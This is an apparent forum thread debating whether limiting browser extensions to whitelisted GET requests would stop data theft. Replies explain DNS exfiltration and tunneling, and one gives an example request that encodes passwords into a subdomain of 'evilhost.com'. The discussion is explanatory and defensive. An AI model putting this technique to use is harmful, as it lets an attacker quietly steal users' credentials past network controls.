4 ms·
This is an apples to oranges comparison. DNS requests exfiltrate data such as IP and the domain you want to visit. Currently extensions can literally upload all
by bgdam 6y ago
This is an apples to oranges comparison. DNS requests exfiltrate data such as IP and the domain you want to visit. Currently extensions can literally upload all your passwords if they wish to. Restricting them to be able to only GET whitelisted URLs (no query params or paramterized URLs) would cut down on pretty much 99.999% of possible data theft scenarios.
- deleted 6y ago[deleted]
- ucosty 6y agoYou can exfiltrate data using regular DNS requests, by hiding the data in the host part of the query. The authoritative name server for the domain can then extract out and re-assemble the data. https://blogs.akamai.com/2017/09/introduction-to-dns-data-exfiltration.html https://blogs.akamai.com/2017/09/introduction-to-dns-data-ex...
- vbezhenar 6y agoExtension can issue GET https://password1-abc_password2-defzzz-password3-zzzfed.evilhost.com/ https://password1-abc_password2-defzzz-password3-zzzfed.evil... and DNS server run by evilhost.com will log that query.
- IncRnd 6y agoThere is a lot more to the DNS protocol and packet structure than you are aware. DNS tunneling is a well-known exfiltration technique which can place data inside of DNS request packets. There are several methods of placing the data in the request packet. In such a case the DNS query might appear as a benign request for IBM.COM's ip address.